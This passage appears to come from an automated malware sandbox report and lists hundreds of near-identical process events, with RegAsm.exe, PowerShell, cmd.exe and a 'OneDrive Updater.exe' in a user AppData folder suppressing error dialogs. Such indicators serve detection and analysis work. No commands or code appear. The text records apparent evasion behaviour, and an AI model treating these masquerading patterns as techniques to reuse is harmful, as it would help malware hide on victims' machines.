                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\cmd.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\cmd.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\cmd.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\cmd.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\conhost.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\dw20.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\dw20.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\dw20.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\dw20.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\dw20.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\dw20.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\dw20.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\dw20.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\dw20.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\dw20.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\dw20.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\dw20.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\dw20.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\dw20.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\dw20.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\dw20.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\dw20.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\dw20.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\dw20.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\dw20.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\dw20.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\dw20.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\dw20.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\dw20.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\dw20.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\dw20.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\dw20.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\dw20.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\dw20.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\dw20.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\dw20.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\dw20.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\dw20.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\dw20.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\dw20.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\dw20.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\dw20.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\svchost.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\svchost.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\svchost.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\svchost.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\svchost.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\svchost.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\svchost.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\svchost.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\svchost.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\svchost.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\OneDriveUpdate\OneDrive Updater.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\OneDriveUpdate\OneDrive Updater.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\OneDriveUpdate\OneDrive Updater.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\OneDriveUpdate\OneDrive Updater.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\OneDriveUpdate\OneDrive Updater.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\OneDriveUpdate\OneDrive Updater.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\OneDriveUpdate\OneDrive Updater.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\OneDriveUpdate\OneDrive Updater.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\OneDriveUpdate\OneDrive Updater.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\OneDriveUpdate\OneDrive Updater.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\OneDriveUpdate\OneDrive Updater.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\OneDriveUpdate\OneDrive Updater.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\OneDriveUpdate\OneDrive Updater.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\OneDriveUpdate\OneDrive Updater.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\OneDriveUpdate\OneDrive Updater.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\OneDriveUpdate\OneDrive Updater.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\OneDriveUpdate\OneDrive Updater.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\OneDriveUpdate\OneDrive Updater.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\OneDriveUpdate\OneDrive Updater.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\OneDriveUpdate\OneDrive Updater.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\OneDriveUpdate\OneDrive Updater.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\OneDriveUpdate\OneDrive Updater.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\OneDriveUpdate\OneDrive Updater.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\OneDriveUpdate\OneDrive Updater.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\OneDriveUpdate\OneDrive Updater.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\OneDriveUpdate\OneDrive Updater.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\OneDriveUpdate\OneDrive Updater.exeProcess information set: NOOPENFILEERRORBOX
